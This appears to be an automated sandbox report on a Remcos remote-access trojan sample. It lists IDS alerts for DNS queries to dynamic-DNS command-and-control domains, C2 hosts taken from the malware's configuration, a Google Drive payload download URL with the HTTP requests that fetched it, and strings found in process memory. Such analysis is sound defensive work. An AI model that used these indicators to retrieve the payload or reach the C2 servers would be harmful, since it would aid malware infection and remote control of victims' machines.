Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53292 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60161 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51254 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63071 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51115 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63084 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:54035 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:53983 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60681 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49533 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56303 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63060 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54360 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57265 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63348 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63174 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52906 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:56622 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57367 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:57995 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:59915 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62286 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52789 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53101 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50622 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58065 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58396 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52272 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:52611 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:50105 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:61198 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60726 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60223 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57578 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54363 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52150 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51942 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51940 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51822 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52641 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50222 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50624 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50797 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:49982 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49702 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63629 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:65343 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49990 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50790 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51698 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:63464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63627 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52256 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54466 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61632 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv
Source: Malware configuration extractor	URLs: tre1ms.freeddns.org
Source: Malware configuration extractor	URLs: freshmysweeterbk.ddns.net
Source: Malware configuration extractor	URLs: mysweeterbk.ddns.net
Source: Malware configuration extractor	URLs: bbhmeetre1ms.freeddns.org
Source: Malware configuration extractor	URLs: myumysmeetr.ddns.net
Source: Malware configuration extractor	URLs: meetre1ms.freeddns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: mysweeterbk.ddns.net
Source: unknown	DNS query: name: freshmysweeterbk.ddns.net
Source: unknown	DNS query: name: myumysmeetr.ddns.net

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02ABE4B8 InternetCheckConnectionA,

9_2_02ABE4B8

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.217.19.238:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.181.33:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

19_2_0041B411

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: freshmeetre1ms.freeddns.org
Source: global traffic	DNS traffic detected: DNS query: freshmysweeterbk.ddns.net
Source: global traffic	DNS traffic detected: DNS query: mysweeterbk.ddns.net
Source: global traffic	DNS traffic detected: DNS query: bbhmeetre1ms.freeddns.org
Source: global traffic	DNS traffic detected: DNS query: myumysmeetr.ddns.net
Source: global traffic	DNS traffic detected: DNS query: meetre1ms.freeddns.org

Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: kn.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.1903384135.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000290C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000290F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1967008119.0000000002AD2000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001F.00000002.2050844522.0000000002B42000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: kn.exe	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: AnyDesk.PIF, 00000009.00000002.1845207168.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.00000000209F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv
Source: AnyDesk.PIF, 00000009.00000003.1823239665.0000000000675000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: AnyDesk.PIF, 00000009.00000002.1845207168.000000000065D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download
Source: AnyDesk.PIF, 00000009.00000002.1845207168.000000000065D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=downloadj
Source: AnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=downlo
Source: AnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontn
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
